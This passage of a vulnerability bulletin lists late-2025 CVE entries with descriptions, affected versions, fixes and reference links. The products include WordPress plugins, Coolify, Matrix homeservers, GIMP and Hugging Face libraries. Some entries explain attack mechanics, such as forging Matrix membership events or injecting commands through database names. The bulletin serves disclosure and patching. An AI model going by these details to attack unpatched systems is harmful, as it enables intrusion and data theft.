| captivateaudio--Captivate Sync | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in captivateaudio Captivate Sync captivatesync-trade allows Blind SQL Injection. This issue affects Captivate Sync: from n/a through <= 3.2.2. | 2025-12-24 | not yet calculated | CVE-2025-68570 | https://vdp.patchstack.com/database/Wordpress/Plugin/captivatesync-trade/vulnerability/wordpress-captivate-sync-plugin-3-2-2-sql-injection-vulnerability?_s_id=cve |
| codepeople--WP Time Slots Booking Form | Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.38. | 2025-12-24 | not yet calculated | CVE-2025-68569 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-time-slots-booking-form/vulnerability/wordpress-wp-time-slots-booking-form-plugin-1-2-38-broken-access-control-vulnerability?_s_id=cve |
| Constantin Boiangiu--Vimeotheque | Cross-Site Request Forgery (CSRF) vulnerability in Constantin Boiangiu Vimeotheque codeflavors-vimeo-video-post-lite allows Cross Site Request Forgery. This issue affects Vimeotheque: from n/a through <= 2.3.5.2. | 2025-12-24 | not yet calculated | CVE-2025-68584 | https://vdp.patchstack.com/database/Wordpress/Plugin/codeflavors-vimeo-video-post-lite/vulnerability/wordpress-vimeotheque-plugin-2-3-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| continuwuity--continuwuity | Conduit is a chat server powered by Matrix. A vulnerability that affects a number of Conduit-derived homeservers allows a remote, unauthenticated attacker to force the target server to cryptographically sign arbitrary membership events. Affected products include Conduit prior to version 0.10.10, continuwuity prior to version 0.5.0, Grapevine prior to commit `9a50c244`, and tuwunel prior to version 1.4.8. The flaw exists because the server fails to validate the origin of a signing request, provided the event's state_key is a valid user ID belonging to the target server. Attackers can forge "leave" events for any user on the target server. This forcibly removes users (including admins and bots) from rooms. This allows denial of service and/or the removal of technical protections for a room (including policy servers, if all users on the policy server are removed). Attackers can forge "invite" events from a victim user to themselves, provided they have an account on a server where there is an account that has the power level to send invites. This allows the attacker to join private or invite-only rooms accessible by the victim, exposing confidential conversation history and room state. Attackers can forge "ban" events from a victim user to any user below the victim user's power level, provided the victim has the power level to issue bans AND the target of the ban resides on the same server as the victim. This allows the attacker to ban anyone in a room who is on the same server as the vulnerable one, but cannot exploit this to ban users on other servers or the victim themself. Conduit fixes the issue in version 0.10.10. continuwuity fixes the issue in commits `7fa4fa98` and `b2bead67`, released in 0.5.0. tuwunel fixes the issue in commit `dc9314de1f8a6e040c5aa331fe52efbe62e6a2c3`, released in 1.4.8. Grapevine fixes the issue in commit `9a50c2448abba6e2b7d79c64243bb438b351616c`. As a workaround, block access to the `PUT /_matrix/federation/v2/invite/{roomId}/{eventId}` endpoint using your reverse proxy. | 2025-12-23 | not yet calculated | CVE-2025-68667 | https://github.com/continuwuity/continuwuity/security/advisories/GHSA-22fw-4jq7-g8r8 https://github.com/matrix-construct/tuwunel/commit/dc9314de1f8a6e040c5aa331fe52efbe62e6a2c3 https://forgejo.ellis.link/continuwuation/continuwuity/commit/7fa4fa98628593c1a963f5aa8dbc3657d604b047 https://forgejo.ellis.link/continuwuation/continuwuity/commit/b2bead67ac8bc45de9a612578f295e5b7fc6c2b5 https://gitlab.com/famedly/conduit/-/releases/v0.10.10 https://gitlab.computer.surgery/matrix/grapevine/-/commit/9a50c2448abba6e2b7d79c64243bb438b351616c |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Database Backup functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Database names used in backup operations are passed directly to shell commands without sanitization, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66209 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Database Import functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Database names used in import operations are passed directly to shell commands without sanitization, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66210 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in PostgreSQL Init Script Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. PostgreSQL initialization script filenames are passed to shell commands without proper validation, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66211 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Dynamic Proxy Configuration Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Proxy configuration filenames are passed to shell commands without proper escaping, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66212 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the File Storage Directory Mount Path functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. The file_storage_directory_source parameter is passed directly to shell commands without proper sanitization, enabling full remote code execution on the host system. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66213 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| creativeinteractivemedia--Real 3D FlipBook | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in creativeinteractivemedia Real 3D FlipBook real3d-flipbook-lite allows Stored XSS. This issue affects Real 3D FlipBook: from n/a through <= 4.11.4. | 2025-12-24 | not yet calculated | CVE-2025-68512 | https://vdp.patchstack.com/database/Wordpress/Plugin/real3d-flipbook-lite/vulnerability/wordpress-real-3d-flipbook-plugin-4-11-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CRM Perks--Integration for Contact Form 7 HubSpot | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CRM Perks Integration for Contact Form 7 HubSpot cf7-hubspot allows Blind SQL Injection. This issue affects Integration for Contact Form 7 HubSpot: from n/a through <= 1.4.2. | 2025-12-24 | not yet calculated | CVE-2025-68590 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf7-hubspot/vulnerability/wordpress-integration-for-contact-form-7-hubspot-plugin-1-4-2-sql-injection-vulnerability?_s_id=cve |
| Deciso--OPNsense | Deciso OPNsense diag_backup.php filename Directory Traversal Arbitrary File Creation Vulnerability. This vulnerability allows network-adjacent attackers to create arbitrary files on affected installations of Deciso OPNsense. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of backup configuration files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to create files in the context of root. Was ZDI-CAN-28133. | 2025-12-23 | not yet calculated | CVE-2025-13698 | ZDI-25-1022 vendor-provided URL |
| Delta Electronics--DVP-12SE | DVP-12SE - Modbus/TCP Cleartext Transmission of Sensitive Information | 2025-12-26 | not yet calculated | CVE-2025-62578 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00021_DVP-12SE%20ModbusTCP%20Cleartext%20Transmission%20of%20Sensitive%20Info.pdf |
| DeluxeThemes--Userpro | Missing Authorization vulnerability in DeluxeThemes Userpro userpro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Userpro: from n/a through <= 5.1.9. | 2025-12-24 | not yet calculated | CVE-2025-68608 | https://vdp.patchstack.com/database/Wordpress/Plugin/userpro/vulnerability/wordpress-userpro-plugin-5-1-9-broken-access-control-vulnerability?_s_id=cve |
| DreamFactory--DreamFactory | DreamFactory saveZipFile Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of DreamFactory. Authentication is required to exploit this vulnerability. The specific flaw exists within the implementation of the saveZipFile method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26589. | 2025-12-23 | not yet calculated | CVE-2025-13700 | ZDI-25-1024 vendor-provided URL |
| Ecommerce Platforms--Gift Hunt | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ecommerce Platforms Gift Hunt gift-hunt allows Stored XSS. This issue affects Gift Hunt: from n/a through <= 2.0.2. | 2025-12-24 | not yet calculated | CVE-2025-67631 | https://vdp.patchstack.com/database/Wordpress/Plugin/gift-hunt/vulnerability/wordpress-gift-hunt-plugin-2-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| eigent-ai--eigent | Eigent is a multi-agent Workforce. In version 0.0.60, a 1-click Remote Code Execution (RCE) vulnerability has been identified in Eigent. This vulnerability allows an attacker to execute arbitrary code on the victim's machine or server through a specific interaction (1-click). This issue has been patched in version 0.0.61. | 2025-12-27 | not yet calculated | CVE-2025-68952 | https://github.com/eigent-ai/eigent/security/advisories/GHSA-pwcx-28p4-rmq4 |
| Embeds For YouTube Plugin Support--YouTube Embed | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Embeds For YouTube Plugin Support YouTube Embed youtube-embed allows Stored XSS. This issue affects YouTube Embed: from n/a through <= 5.4. | 2025-12-24 | not yet calculated | CVE-2025-68599 | https://vdp.patchstack.com/database/Wordpress/Plugin/youtube-embed/vulnerability/wordpress-youtube-embed-plugin-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.5.1, 5.4.3, 5.3.4, 5.2.6, 5.1.6, and earlier, in the ESP-IDF Bluetooth host stack (BlueDroid), the function bta_dm_sdp_result() used a fixed-size array uuid_list[32][MAX_UUID_SIZE] to store discovered service UUIDs during the SDP (Service Discovery Protocol) process. On modern Bluetooth devices, it is possible for the number of available services to exceed this fixed limit (32). In such cases, if more than 32 services are discovered, subsequent writes to uuid_list could exceed the bounds of the array, resulting in a potential out-of-bounds write condition. | 2025-12-26 | not yet calculated | CVE-2025-68473 | https://github.com/espressif/esp-idf/security/advisories/GHSA-hmjj-rjvv-w8pq https://github.com/espressif/esp-idf/commit/3286e45349b0b5c2b1422ef7e8d088b95eef895d https://github.com/espressif/esp-idf/commit/4d928f2265c394d2abc85024228e920a5b26bcab https://github.com/espressif/esp-idf/commit/5b3185168dae83d42aa0852689422fffd931f16c https://github.com/espressif/esp-idf/commit/6453f57a954458ad8ffd6e4bf2d9e76b73fac0f1 https://github.com/espressif/esp-idf/commit/6ca6f422dafaffcb88fa56cc458ce92d96be3b2e https://github.com/espressif/esp-idf/commit/9889edd799cf369e082df9d01adba961d64693ed https://github.com/espressif/esp-idf/commit/ecb86d353640cf1375bf97db32e702ba59c551b6 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.5.1, 5.4.3, 5.3.4, 5.2.6, 5.1.6, and earlier, in the avrc_vendor_msg() function of the ESP-IDF BlueDroid AVRCP stack, the allocated buffer size was validated using AVRC_MIN_CMD_LEN (20 bytes). However, the actual fixed header data written before the vendor payload exceeds this value. This totals 29 bytes written before p_msg->p_vendor_data is copied. Using the old AVRC_MIN_CMD_LEN could allow an out-of-bounds write if vendor_len approaches the buffer limit. For commands where vendor_len is large, the original buffer allocation may be insufficient, causing writes beyond the allocated memory. This can lead to memory corruption, crashes, or other undefined behavior. The overflow could be larger when assertions are disabled. | 2025-12-26 | not yet calculated | CVE-2025-68474 | https://github.com/espressif/esp-idf/security/advisories/GHSA-43gh-7r4f-qp57 https://github.com/espressif/esp-idf/commit/0b0b59f2e19cb99dfa1b28c284d1c5c1d276a132 https://github.com/espressif/esp-idf/commit/565fa98d0cfd58102204c1cb636747e17ee59845 https://github.com/espressif/esp-idf/commit/8262ee807d5cd425f66304f703eeb3382fb888c0 https://github.com/espressif/esp-idf/commit/a6c1bc5e3e91ad1cb964ce2c178ee40a5d10a4a0 https://github.com/espressif/esp-idf/commit/aa0e3d75db995b7137b55349fc92ee684b47092d https://github.com/espressif/esp-idf/commit/b9ba1e29b65536ab4b670ac099585d09adce0376 |
| Essekia--Tablesome | Insertion of Sensitive Information Into Sent Data vulnerability in Essekia Tablesome tablesome allows Retrieve Embedded Sensitive Data. This issue affects Tablesome: from n/a through <= 1.1.35.1. | 2025-12-24 | not yet calculated | CVE-2025-68516 | https://vdp.patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| Essekia--Tablesome | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tablesome: from n/a through <= 1.1.35.1. | 2025-12-24 | not yet calculated | CVE-2025-68517 | https://vdp.patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-1-broken-access-control-vulnerability?_s_id=cve |
| FolioVision--FV Simpler SEO | Missing Authorization vulnerability in FolioVision FV Simpler SEO fv-all-in-one-seo-pack allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FV Simpler SEO: from n/a through <= 1.9.6. | 2025-12-24 | not yet calculated | CVE-2025-68579 | https://vdp.patchstack.com/database/Wordpress/Plugin/fv-all-in-one-seo-pack/vulnerability/wordpress-fv-simpler-seo-plugin-1-9-6-broken-access-control-vulnerability?_s_id=cve |
| Forgejo--Forgejo | Forgejo before 13.0.2 allows attackers to write to unintended files, and possibly obtain server shell access, because of mishandling of out-of-repository symlink destinations for template repositories. This is also fixed for 11 LTS in 11.0.7 and later. | 2025-12-25 | not yet calculated | CVE-2025-68937 | https://codeberg.org/forgejo/forgejo/src/branch/forgejo/release-notes-published/13.0.2.md https://codeberg.org/forgejo/forgejo/src/branch/forgejo/release-notes-published/11.0.7.md https://codeberg.org/forgejo/forgejo/milestone/29156 https://codeberg.org/forgejo/forgejo/milestone/27340 https://codeberg.org/forgejo/security-announcements/issues/43 https://blog.gitea.com/release-of-1.24.7/ |
| FreshRSS--FreshRSS | FreshRSS is a free, self-hostable RSS aggregator. Prior to version 1.28.0, FreshRSS uses cryptographically weak random number generators (mt_rand() and uniqid()) to generate remember-me authentication tokens and challenge-response nonces. This allows attackers to predict valid session tokens, leading to account takeover through persistent session hijacking. The remember-me tokens provide permanent authentication and are the sole credential for "keep me logged in" functionality. This issue has been patched in version 1.28.0. | 2025-12-26 | not yet calculated | CVE-2025-68932 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-j9wc-gwc6-p786 https://github.com/FreshRSS/FreshRSS/pull/8061 https://github.com/FreshRSS/FreshRSS/commit/57e1a375cbd2db9741ff19167813344f8eff5772 |
| Funnelforms--Funnelforms Free | Missing Authorization vulnerability in Funnelforms Funnelforms Free funnelforms-free allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Funnelforms Free: from n/a through <= 3.8. | 2025-12-24 | not yet calculated | CVE-2025-68582 | https://vdp.patchstack.com/database/Wordpress/Plugin/funnelforms-free/vulnerability/wordpress-funnelforms-free-plugin-3-8-broken-access-control-vulnerability?_s_id=cve |
| GIMP--GIMP | GIMP PNM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PNM files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28273. | 2025-12-23 | not yet calculated | CVE-2025-14422 | ZDI-25-1136 vendor-provided URL |
| GIMP--GIMP | GIMP LBM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LBM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28311. | 2025-12-23 | not yet calculated | CVE-2025-14423 | ZDI-25-1137 vendor-provided URL |
| GIMP--GIMP | GIMP XCF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XCF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28376. | 2025-12-23 | not yet calculated | CVE-2025-14424 | ZDI-25-1138 vendor-provided URL |
| GIMP--GIMP | GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28248. | 2025-12-23 | not yet calculated | CVE-2025-14425 | ZDI-25-1139 vendor-provided URL |
| Gora Tech--Cooked | Missing Authorization vulnerability in Gora Tech Cooked cooked allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cooked: from n/a through <= 1.11.2. | 2025-12-24 | not yet calculated | CVE-2025-68586 | https://vdp.patchstack.com/database/Wordpress/Plugin/cooked/vulnerability/wordpress-cooked-plugin-1-11-2-broken-access-control-vulnerability?_s_id=cve |
| Hanwha Vision Co., Ltd.--Device Manager | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered a vulnerability in Device Manager: a hardcoded encryption key is used to protect sensitive information. An attacker can use this key to decrypt sensitive information. The manufacturer has released patched firmware for the flaw; please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52601 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has found a flaw in which the camera's client service does not perform certificate validation. The manufacturer has released patched firmware for the flaw; please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52598 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered inadequate permission management for the camera guest account. The manufacturer has released patched firmware for the flaw; please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52599 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered an improper input validation vulnerability in the camera video analytics. This vulnerability could allow an attacker to execute specific commands on the user's host PC. The manufacturer has released patched firmware for the flaw; please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52600 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered that validation of incoming XML format request messages is inadequate. This vulnerability could allow an attacker to perform XSS in the user's browser. The manufacturer has released patched firmware for the flaw; please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-8075 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| HasThemes--WC Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes WC Builder wc-builder allows Stored XSS. This issue affects WC Builder: from n/a through <= 1.2.0. | 2025-12-24 | not yet calculated | CVE-2025-68533 | https://vdp.patchstack.com/database/Wordpress/Plugin/wc-builder/vulnerability/wordpress-wc-builder-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hugging Face--Accelerate | Hugging Face Accelerate Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Accelerate. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27985. | 2025-12-23 | not yet calculated | CVE-2025-14925 | ZDI-25-1140 |
| Hugging Face--Diffusers | Hugging Face Diffusers CogView4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Diffusers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27424. | 2025-12-23 | not yet calculated | CVE-2025-14922 | ZDI-25-1142 |
| Hugging Face--smolagents | Hugging Face smolagents Remote Python Executor Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face smolagents. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parsing of pickle data. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28312. | 2025-12-23 | not yet calculated | CVE-2025-14931 | ZDI-25-1143 |
| Hugging Face--Transformers | Hugging Face Transformers Perceiver Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25423. | 2025-12-23 | not yet calculated | CVE-2025-14920 | ZDI-25-1150 |
| Hugging Face--Transformers | Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424. | 2025-12-23 | not yet calculated | CVE-2025-14921 | ZDI-25-1149 |
| Hugging Face--Transformers | Hugging Face Transformers megatron_gpt2 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27984. | 2025-12-23 | not yet calculated | CVE-2025-14924 | ZDI-25-1141 |
| Hugging Face--Transformers | Hugging Face Transformers SEW convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint. The specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28251. | 2025-12-23 | not yet calculated | CVE-2025-14926 | ZDI-25-1147 |
| Hugging Face--Transformers | Hugging Face Transformers SEW-D convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint. The specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28252. | 2025-12-23 | not yet calculated | CVE-2025-14927 | ZDI-25-1148 |
| Hugging Face--Transformers | Hugging Face Transformers HuBERT convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint. The specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28253. | 2025-12-23 | not yet calculated | CVE-2025-14928 | ZDI-25-1146 |
| Hugging Face--Transformers | Hugging Face Transformers X-CLIP Checkpoint Conversion Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28308. | 2025-12-23 | not yet calculated | CVE-2025-14929 | ZDI-25-1144 |
| Hugging Face--Transformers | Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309. | 2025-12-23 | not yet calculated | CVE-2025-14930 | ZDI-25-1145 |
| icc0rz--H5P | Missing Authorization vulnerability in icc0rz H5P h5p allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects H5P: from n/a through <= 1.16.1. | 2025-12-24 | not yet calculated | CVE-2025-68505 | https://vdp.patchstack.com/database/Wordpress/Plugin/h5p/vulnerability/wordpress-h5p-plugin-1-16-1-broken-access-control-vulnerability?_s_id=cve |
| Icegram--Icegram Express Pro | Deserialization of Untrusted Data vulnerability in Icegram Icegram Express Pro email-subscribers-premium allows Object Injection. This issue affects Icegram Express Pro: from n/a through <= 5.9.11. | 2025-12-24 | not yet calculated | CVE-2025-68038 | https://vdp.patchstack.com/database/Wordpress/Plugin/email-subscribers-premium/vulnerability/wordpress-icegram-express-pro-plugin-5-9-11-php-object-injection-vulnerability?_s_id=cve |
| IceWarp--IceWarp | IceWarp gmaps Cross-Site Scripting Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of IceWarp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of a parameter passed to the gmaps webpage. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-25441. | 2025-12-23 | not yet calculated | CVE-2025-14499 | ZDI-25-1071 vendor-provided URL |
| IceWarp--IceWarp | IceWarp14 X-File-Operation Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IceWarp. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the X-File-Operation header. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-27394. | 2025-12-23 | not yet calculated | CVE-2025-14500 | ZDI-25-1072 |
| integrationclaspo--Popup Builder: Exit-Intent pop-up, Spin the Wheel, Newsletter signup, Email Capture & Lead Generation forms maker | Missing Authorization vulnerability in integrationclaspo Popup Builder: Exit-Intent pop-up, Spin the Wheel, Newsletter signup, Email Capture & Lead Generation forms maker claspo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Popup Builder: Exit-Intent pop-up, Spin the Wheel, Newsletter signup, Email Capture & Lead Generation forms maker: from n/a through <= 1.0.5. | 2025-12-24 | not yet calculated | CVE-2025-68568 | https://vdp.patchstack.com/database/Wordpress/Plugin/claspo/vulnerability/wordpress-popup-builder-exit-intent-pop-up-spin-the-wheel-newsletter-signup-email-capture-lead-generation-forms-maker-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve |
